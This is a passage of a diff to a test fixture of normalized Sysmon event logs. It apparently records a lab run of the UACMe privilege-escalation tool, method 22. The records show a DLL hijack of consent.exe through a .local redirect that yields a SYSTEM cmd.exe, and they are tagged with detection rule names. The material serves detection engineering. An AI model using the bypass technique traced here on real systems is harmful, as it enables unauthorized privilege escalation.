"nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC3D0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00107a250601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7472", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.760Z", "type": "raw", "uuid": "4358e286-1ee5-4521-af33-0ede7dac5ef4" }
-{ "action": "create", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8183818Z\"},\"EventRecordID\":\"5438\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - UAC Bypass UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.721\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\comctl32.dll\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2019-08-03 12:08:13.721\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - UAC Bypass UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\temp\\comctl32.dll", "object.name": "comctl32.dll", "object.path": 
"c:\\users\\ieuser\\appdata\\local\\temp\\", "object.property": "creation time", "object.value": "2019-08-03T12:08:13.721Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\explorer.exe", "subject.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "subject.process.id": "5336", "subject.process.name": "explorer.exe", "subject.process.path": "c:\\windows\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.721Z", "type": "raw", "uuid": "114bdb77-3e56-4e56-91f1-c348231ab6e7" }
-{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.6360892Z\"},\"EventRecordID\":\"5437\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.624\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.9.1905\"},{\"Name\":\"Description\",\"text\":\"UACMe main module\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"CommandLine\",\"text\":\"UACME.exe 
22\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9E57914D39FBFE785C915E225011892613C4714C,MD5=D57E778DF10F801F47119A04BE990FFD,SHA256=D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378,IMPHASH=B6789EDFE23DDA911AE37C87444D3DCB\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5a29-5d45-0000-0010deb99000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5780\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "UACME.exe 22", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", 
"object.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.hash.imphash": "B6789EDFE23DDA911AE37C87444D3DCB", "object.process.hash.md5": "D57E778DF10F801F47119A04BE990FFD", "object.process.hash.sha1": "9E57914D39FBFE785C915E225011892613C4714C", "object.process.hash.sha256": "D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378", "object.process.id": "5336", "object.process.meta": "Description:UACMe main module | Product:UACMe | Company:Hazardous Environments", "object.process.name": "uacme.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-5a29-5d45-0000-0010deb99000", "object.process.parent.id": "5780", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "3.1.9.1905", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.624Z", "type": "raw", "uuid": "a82cad3b-7c34-44ff-afea-535b46c1e49e" }
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:55.4089224Z\"},\"EventRecordID\":\"5455\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:55.376\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7957-5d45-0000-00100e620a01}\"},{\"Name\":\"ProcessId\",\"text\":\"3116\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BCAF0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BCAF0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7957-5d45-0000-00100e620a01", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "3116", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:55.376Z", "type": "raw", "uuid": "307840cf-68d8-4456-803b-09d028088acc"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5551743Z\"},\"EventRecordID\":\"5453\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.377\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"SourceProcessId\",\"text\":\"7564\"},{\"Name\":\"SourceThreadId\",\"text\":\"7188\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\consent.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"TargetProcessId\",\"text\":\"4192\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+47241|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+46196|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+48f07|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44865|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44648|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44672|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+d62ca|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+c3879|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+756c3|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+7566e\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": 
"Manipulation", "datafield5": "7188", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\Windows\\SYSTEM32\\ntdll.dll+48f07|C:\\Windows\\SYSTEM32\\ntdll.dll+44865|C:\\Windows\\SYSTEM32\\ntdll.dll+44648|C:\\Windows\\SYSTEM32\\ntdll.dll+44672|C:\\Windows\\SYSTEM32\\ntdll.dll+d62ca|C:\\Windows\\SYSTEM32\\ntdll.dll+c3879|C:\\Windows\\SYSTEM32\\ntdll.dll+756c3|C:\\Windows\\SYSTEM32\\ntdll.dll+7566e", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.id": "4192", "object.process.name": "cmd.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.377Z", "type": "raw", "uuid": 
"6495c614-7815-48db-b001-15f7a3b97059"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5547781Z\"},\"EventRecordID\":\"5452\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.391\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"ProcessId\",\"text\":\"4192\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", 
"object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4192", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.391Z", "type": "raw", "uuid": "32c28c58-c00a-498a-9029-76636a5f0bb7"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5243142Z\"},\"EventRecordID\":\"5451\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.363\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": 
"PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.363Z", "type": "raw", "uuid": "4d0abd6d-a99b-4817-a3e0-6438c1b28920"} +{"action": "start", "body": 
